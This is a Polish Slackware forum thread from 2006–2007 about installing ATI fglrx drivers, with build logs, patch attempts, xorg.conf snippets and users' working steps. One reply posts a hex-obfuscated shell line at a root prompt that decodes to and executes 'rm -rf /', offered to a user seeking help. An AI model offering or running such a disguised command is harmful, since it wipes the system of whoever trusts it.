intalacja sterowników ATI

W tym miejscu zapraszamy Was do współpracy. Czekamy na propozycje, sugestie i rady.
Moderatorzy zatroszczą się o to, by najlepsze teksty trafiły do FAQ.

Moderatorzy: Moderatorzy, Administratorzy

anath0r
Użytkownik
Posty: 37
Rejestracja: 2006-07-18, 11:12

Re: intalacja sterowników ATI

Post autor: anath0r » 2006-12-14, 19:33

Mam kernel 2.6.18
Wg tego opisu
anath0r@darkstar:/lib/modules/fglrx/build_mod$ su
Hasło:
root@darkstar:/lib/modules/fglrx/build_mod# patch -p0 < fglrx-2.6.12-inter_module_get.patch
patching file firegl_public.c
Hunk #1 FAILED at 341.
1 out of 1 hunk FAILED -- saving rejects to file firegl_public.c.rej
agpgart poszedl SUCCED
new-agpgart tez wywalil 1/3 bledy
ale mniejsza o to bo to nie na moja wersje kernela nawet jest i pewnie dlatego failed. nie znalazlem innej wersji inter module get ani new agpgart wiec ominalem ten krok
po skompilowaniu pokazal mi sie tamten komunikacik ze wszystko jest OK...

do skonfigurowania xorg.conf uzylem aticonfig --initial --input=/etc/X11/xorg.conf no ale on dopisal tylko do xorg.conf swoje defaultowe ustawienia screena,monitora,device.. po reboocie musialem przywracac te ustawienia z backupa zeby X'y sie odpalily
ponadto
anath0r@darkstar:~$ glxinfo
name of display: :0.0
Xlib: extension "XFree86-DRI" missing on display ":0.0".
display: :0 screen: 0
direct rendering: No
:(
Jak włączyć tę upierdliwą akcelerację?
Pozdrawiam i liczę na odpowiedź! :)

Awatar użytkownika
ethnoe
Użytkownik
Posty: 653
Rejestracja: 2006-01-31, 17:58
Lokalizacja: Helsinki
Kontakt:

Re: intalacja sterowników ATI

Post autor: ethnoe » 2006-12-14, 20:16

Tu masz dla Gentoo, w zasadzie początek ten sam - skonfiguruj dobrze jądro. Ściągasz stery ze stronki ATI do swojej karty, instalujesz je (powinieneś sciągnąć taki program instalujący) i potem wróć do tego poradnika, żeby skonfigurować x-y. Mi nie sprawiła żadnych trudności instalacja.
Samo słowo ubuntu pochodzi z języka Zulu i oznacza człowieczeństwo wobec innych, choć niektórzy tłumaczą je jako "nie potrafię skonfigurować Slackware"

Awatar użytkownika
Spaulding
Użytkownik
Posty: 564
Rejestracja: 2005-07-17, 14:59
Lokalizacja: Chełm
Kontakt:

Re: intalacja sterowników ATI

Post autor: Spaulding » 2006-12-15, 20:38

po co uzywasz starych sterow ? wogole to powinno zuptadowac sie to how-to ? jacys chetni ?
Powered By:
funtoo, openbox, mc, ekg2, git, ssh...
(very unstable packages but stable system :>)

anath0r
Użytkownik
Posty: 37
Rejestracja: 2006-07-18, 11:12

Re: intalacja sterowników ATI

Post autor: anath0r » 2006-12-16, 07:44

nie no spokojnie uzywam najnowszych sterow prosto ze stronki ati takze jest dobrze:]
ethnoe, dzieki za link! w wolnym czasie przesledze to wszystko, ale juz przynajmniej wiem czemu mi fglrxconfig sie nie odpalal ;)
no i ja uzywalem innego opisu tez z gentoo ale ten jest bardziej szczegolowy..
bedzie dobrze! dzieki

Awatar użytkownika
BilboBaggins
Użytkownik
Posty: 13
Rejestracja: 2006-10-06, 12:35
Lokalizacja: Częstochowa
Kontakt:

Re: intalacja sterowników ATI

Post autor: BilboBaggins » 2007-01-01, 23:22

A ja juz zupelnie zglupialem...
Podazalem za wskazowkami kilku manuali i nic mi z tego nie wyszlo.
Moj konfig:
Athlon XP 1500+
Plyta glowna na VIA KT233A (agpgart rozpoznaje)
Radeon 9600Pro 128MB na AGP (z racji mozliwosci plyty mam AGP4x)
Slackware 11.0
Kernel 2.6.17.8
Driver ATI wersja 8.32.5

Opis problemu:
X'y sie odpalaja, wszystko jest niby OK, oprocz braku akceleracji (glxinfo mowi "Driect rendering: No", a fglrxinfo twierdzi, ze mam Mese...). Dodatwkowo odgrzebalem w logu serwera nastepujacy blad:

Kod: Zaznacz cały

(II) fglrx(0): [pci] find AGP GART
(EE) fglrx(0): [agp] unable to acquire AGP, error "xf86_ENODEV"
(EE) fglrx(0): cannot init AGP
Jakies pomysly?
Ostatnio zmieniony 2007-01-01, 23:22 przez BilboBaggins, łącznie zmieniany 1 raz.
Whack!

sayetan
Moderator w st. spocz.
Posty: 2193
Rejestracja: 2004-06-20, 21:47
Lokalizacja: Jelenia Góra

Re: intalacja sterowników ATI

Post autor: sayetan » 2007-01-01, 23:25

# `echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"`

Awatar użytkownika
naglfar
Użytkownik
Posty: 12
Rejestracja: 2007-01-17, 23:17

Re: intalacja sterowników ATI

Post autor: naglfar » 2007-01-17, 23:44

Kilka dni temu zainstalowałem Slackware 11, konfiguruję sobie powoli system, ale w starciu z ATI poległem. Przeszukałem forum, zapytałem google i nic... Więc piszę tu. :neutral:

Mam krenela 2.6.18, ustawiłem te kilka opcji, skompilowałem go na nowo, zainstalowałem sterowniki ATI dla mojego Radeona X1300, ściągnąłem patche, przy pierwszym 1 hunk był failed, drugi poszedł ok, przy trzecim 2 były failed. Jak pisał anath0r, spowodowane jest to inną wersją kernela, ale nowszych patchów dalej nie ma. W przeciwnieśtwie jednak do niego, kompilacja fglrx nie przebiega pomyślnie, tylko wysupuje się na początku, nie mam pojęcia co z tym zrobic.

Kod: Zaznacz cały

root@slack:/lib/modules/fglrx/build_mod# sh make.sh
ATI module generator V 2.0
==========================
initializing...
cat: /lib/modules/2.6.18/build/include/linux/version-*.h: No such file or directory
make.sh: line 525: [: =: unary operator expected
cleaning...
patching 'highmem.h'...
assuming new VMA API since we do have kernel 2.6.x...
 Assuming default VMAP API
 Assuming default munmap API
doing Makefile based build for kernel 2.6.x and higher
make -C /lib/modules/2.6.18/build SUBDIRS=/lib/modules/fglrx/build_mod/2.6.x modules
make[1]: Entering directory `/usr/src/linux-2.6.18'
  CC [M]  /lib/modules/fglrx/build_mod/2.6.x/firegl_public.o
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:465: warning: initialization from incompatible pointer type
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c: In function `firegl_stub_open':
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:588: warning: assignment discards qualifiers from pointer target type
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c: At top level:
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3595: error: redefinition of 'fglrx_compat_agp_backend_acquire'
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3549: error: previous definition of 'fglrx_compat_agp_backend_acquire' was here
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3603: error: redefinition of 'fglrx_compat_agp_backend_release'
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3557: error: previous definition of 'fglrx_compat_agp_backend_release' was here
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3609: error: redefinition of 'fglrx_compat_agp_allocate_memory'
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3563: error: previous definition of 'fglrx_compat_agp_allocate_memory' was here
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3614: error: redefinition of 'fglrx_compat_agp_enable'
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3568: error: previous definition of 'fglrx_compat_agp_enable' was here
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3619: error: redefinition of 'fglrx_compat_agp_copy_info'
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3573: error: previous definition of 'fglrx_compat_agp_copy_info' was here
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3658:2: #else after #else
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3585:1: the conditional began here
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3675:2: #else after #else
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3585:1: the conditional began here
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3482:1: unterminated #if
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:17:1: unterminated #ifdef
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:2334: warning: 'deferred_flush' defined but not used
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3512: warning: 'firegl_wrap_agp_allocate_memory' defined but not used
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3517: warning: 'firegl_wrap_agp_enable' defined but not used
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3522: warning: 'firegl_wrap_agp_backend_acquire' defined but not used
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3528: warning: 'firegl_wrap_agp_backend_release' defined but not used
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3534: warning: 'firegl_wrap_agp_copy_info' defined but not used
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3549: warning: 'fglrx_compat_agp_backend_acquire' defined but not used
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3557: warning: 'fglrx_compat_agp_backend_release' defined but not used
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3563: warning: 'fglrx_compat_agp_allocate_memory' defined but not used
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3568: warning: 'fglrx_compat_agp_enable' defined but not used
/lib/modules/fglrx/build_mod/2.6.x/firegl_public.c:3573: warning: 'fglrx_compat_agp_copy_info' defined but not used
make[2]: *** [/lib/modules/fglrx/build_mod/2.6.x/firegl_public.o] Error 1
make[1]: *** [_module_/lib/modules/fglrx/build_mod/2.6.x] Error 2
make[1]: Leaving directory `/usr/src/linux-2.6.18'
make: *** [kmod_build] Error 2
build failed with return value 2
Zamieniłem ścieżki w make.sh z /lib/modules/2.6.18/build/include/linux/version-*.h na /lib/modules/2.6.18/build/include/linux/version.h bo tylko taki plik u mnie istnieje, nic się nie poprawiło poza zniknięciem błędu z brakiem tego pliku.

Liczę na jakąś poradę. :-)
Ostatnio zmieniony 2007-01-17, 23:50 przez naglfar, łącznie zmieniany 1 raz.

pushpull
Użytkownik
Posty: 2
Rejestracja: 2007-03-01, 23:15

Re: intalacja sterowników ATI

Post autor: pushpull » 2007-03-02, 14:10

ostatnio bujałem się po różnych dystrybucjach, po to tylko żeby wrócić z powrotem do slackware'a :] i chyba już przy nim zostanę. i w każdej był problem z isntalacją sterów do ati (radeon 9550). jakież moje zdziwienie było jak tym razem mi się udało. postaram się powiedzieć co zrobiłem.
zaznaczam że instalacja była świeża z jądrem test26.s nic potem nie przekompilowywałem

ściągnąłem skrypt instalacyjny ze stronki ati http://ati.amd.com/support/driver.html
odpaliłem go

Kod: Zaznacz cały

sh ./ati-driver-installer-8.34.8-x86.x86_64.run
wybrałem opcję custom i zaznaczyłem drivery, moduł i control panel (powinno mi się tam ukazać kilka wersji Xów, jednak pokazała się jakaś domyślna chyba)

następnie uruchomiłem

Kod: Zaznacz cały

aticonfig --initial
co przerobiło mi xorg.conf

dalej przejrzałem xorg.conf i zakomentowałem sekcje dotyczące monitora i karty które były wcześniej, zostawiłem tylko to co dopisało ati

Kod: Zaznacz cały

Section "Monitor"
        Identifier   "aticonfig-Monitor[0]"
        Option      "VendorName" "ATI Proprietary Driver"
        Option      "ModelName" "Generic Autodetecting Monitor"
        Option      "DPMS" "true"
EndSection
Section "Device"
        Identifier  "aticonfig-Device[0]"
        Driver      "fglrx"
EndSection
Section "Screen"
        Identifier "aticonfig-Screen[0]"
        Device     "aticonfig-Device[0]"
        Monitor    "aticonfig-Monitor[0]"
        DefaultDepth     24
        SubSection "Display"
                Viewport   0 0
                Depth     24
                Modes    "1280x1024" "1024x768"
        EndSubSection
EndSection
oraz dodałem 2 rzeczy:

Kod: Zaznacz cały

Section "Module"
        Load    "dri"
        Load    "glx"
EndSection

Section "dri"
        Mode 0666
EndSection
następnie do /etc/fstab dopisałem

Kod: Zaznacz cały

shm     /dev/shm        tmpfs   defaults        0       0
reboot i akceleracja działa :] i nawet mam ati control panel. oczywiście brakuje mu dużo do tego co jest w windowsie, ale od czegoś trzeba zacząć.

może trochę niejasno to wszystko brzmi, ale działa. w razie niejasności proszę o uwagi.
Ostatnio zmieniony 2007-03-02, 18:54 przez pushpull, łącznie zmieniany 1 raz.

Awatar użytkownika
zgola
Użytkownik
Posty: 96
Rejestracja: 2005-08-12, 10:30
Lokalizacja: leszno
Kontakt:

Re: intalacja sterowników ATI

Post autor: zgola » 2007-03-02, 14:19

http://forum.slackware.pl/viewtopic.php?t=13621

na koncu watku umiescilem link, zawartosc bardziej zrozumiala... ;)
Jeśli chcesz pomóc biednemu studentowi nie wahaj się ani chwili, przelej co łaska, sam wiesz jak teraz ciężko jest o kieliszek chleba nr konta: 52 1140 2004 0000 3102 4349 6053

dr
Użytkownik
Posty: 108
Rejestracja: 2007-01-02, 09:59
Lokalizacja: Iława

Re: intalacja sterowników ATI

Post autor: dr » 2007-03-03, 16:10

Kurcze zaczynam przygodę z linuxem a udało mi się na laptopie odpalic sterowniki ATI za pierwszym razem.
Dzięki Wam.

didek666
Użytkownik
Posty: 49
Rejestracja: 2007-01-02, 22:11

Re: intalacja sterowników ATI

Post autor: didek666 » 2007-03-16, 22:30

Ja mam natomiast problem z zainstalowaniem samego skryptu, oto log:

Kod: Zaznacz cały

[Message] Kernel Module : Trying to install a precompiled kernel module.
[Message] Kernel Module : Precompiled kernel module version mismatched.
[Message] Kernel Module : Found kernel module build environment, generating kernel module now.
ATI module generator V 2.0
==========================
initializing...
Error:
kernel includes at /lib/modules/2.6.18/build/include do not match current kernel.
they are versioned as ""
instead of "2.6.18".
you might need to adjust your symlinks:
- /usr/include
- /usr/src/linux
[Error] Kernel Module : Failed to compile kernel module - please consult readme.
Zdaję mi się, że muszę symlinki porobić do /usr/src/linux/include, ale nie jestem pewien.
Z góry dziękuję za pomoc.
Za OpenSource!
Wspomóż [url=http://slackwiki.ovh.org]Polski Projekt Slackwiki[/url]!

chudy_dzik
Użytkownik
Posty: 32
Rejestracja: 2006-04-22, 07:57
Lokalizacja: mmz
Kontakt:

Re: intalacja sterowników ATI

Post autor: chudy_dzik » 2007-03-18, 13:26

Męczyłem się trochę z tym, przedstawiam jak ja to zrobiłem, może komuś się przyda.

Instalcja sterowników

Kod: Zaznacz cały

sh ati-driver-installer-8.34.8-x86.x86_64.run
Na wszystkie pytania instalatora dajemy dalej
Teraz będzie trudniej ;) wchodzimy do katalogu: /lib/modules/fglrx i ściagamy fglrx-2.6.20.patch

Kod: Zaznacz cały

wget http://darcs.frugalware.org/repos/frugalware-current/source/x11-extra/ fglrx/fglrx-2.6.20.patch
Pora zaaplikować tego patcha: wchodzimy do /lib/modules/fglrx/build_mod

Kod: Zaznacz cały

patch -Np1 < ../fglrx-2.6.20.patch
jak zapyta się jakim plikiem się zająć odpowiadamy, że firegl_public.c (nie wiem czemu, ale u mnie dopiero za drugim razem ten patch zadziałał). Teraz

Kod: Zaznacz cały

sh make.sh
Zasypie nam konsole errorami, ale jak na końcu poprosi o wejście do katalogu wyżej i wykonanie skryptu make_install.sh tak też zrobimy:

Kod: Zaznacz cały

cd ../ && sh make_install.sh
Teraz sterownik powinien być zrobiony i zainstalowany i gotowy do użycia.

Konfiguracja sterowników:
wywołujemy program aticonfig (sporo jego opcji można znaleźć w jego helpie, aticonfig -h), wywołujemy go poleceniem:

Kod: Zaznacz cały

/usr/X11R6/bin/aticonfig --initial --input=/etc/X11/xorg.conf
/usr/X11R6/bin/aticonfig --ovt=Xv
Program aticonfig przerobi nam xorg.config tak, żeby używał jako sterownika fglrx’a. Proponuję teraz przejrzeć plik /etc/X11/xorg.conf w celu upewnienia się, że nic nam się nie namieszało.


Mam nadzieję że komuś się przyda.
Pełny opis zamieściłem na swoim blogu: http://darojest.bee.pl/?page_id=43
http://daro.blogu.pl

Awatar użytkownika
Sheytan
Użytkownik
Posty: 473
Rejestracja: 2007-03-31, 10:44
Lokalizacja: Ligota Piękna/Wro
Kontakt:

Re: intalacja sterowników ATI

Post autor: Sheytan » 2007-07-02, 14:36

Witam. Może mi ktoś wyjaśnić o co tu chodzi? Z góry dzięki ;)

Kod: Zaznacz cały

root@szatan:/lib/modules/fglrx/build_mod# sh make.sh
ATI module generator V 2.0
==========================
initializing...
cat: /lib/modules/2.6.18/build/include/linux/version-*.h: No such file or directory
Error:
kernel includes at /lib/modules/2.6.18/build/include do not match current kernel.
they are versioned as ""
instead of "2.6.18".
you might need to adjust your symlinks:
- /usr/include
- /usr/src/linux
[url=http://www.madsheytan.blogspot.com][img]http://img146.imageshack.us/img146/3848/forumstopka.png[/img][/url]
Slackware, because it works. Kubuntu, because it works. Windows, because it syncs my iPod...

Awatar użytkownika
Lizard
Moderator
Posty: 2559
Rejestracja: 2005-05-21, 15:48
Lokalizacja: miasto w mieście

Re: intalacja sterowników ATI

Post autor: Lizard » 2007-07-02, 20:11

Od którejś wersji jądra (dokładnie nie pamiętam, byuć może od 2.6.18.*) usunięto plik version.h

Na innym forum znalazłem taką radę (swoją drogą, to Google najlepszym przyjacielem człowieka):
> make include/linux/version.h

Hmm, jakis postep jest. Zapuscilem ta komende i oto co dostalem:

root@sloneczko:/usr/src/linux-2.6.19# make include/linux/version.h
CHK include/linux/version.h
UPD include/linux/version.h

Plik /usr/src/linux-2.6.19/include/linux/version.h zostal utworzony z
nastepujaca zawartoscia:

#define LINUX_VERSION_CODE 132627
#define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c))
Error 404 - footer not found

Awatar użytkownika
miszmaniac
Moderator
Posty: 1510
Rejestracja: 2006-03-19, 12:00
Lokalizacja: Gdynia
Kontakt:

Re: intalacja sterowników ATI

Post autor: miszmaniac » 2007-07-02, 21:00

Jak mnie to wkur.... jak oni usunęli ostatnio ten plik:)
Ile czasu nie mogłem skumać o co chodzi sterownikowi modemu, że nie mógł znaleźć plików źródeł jądra :)
Pamiętaj,
Jeśli Twój problem został rozwiązany dopisz [b] [Rozw.] [/b]w tytule.
Projektowanie stron WWW: [url=http://www.miszewski.net.pl]www.miszewski.net.pl[/url]

ODPOWIEDZ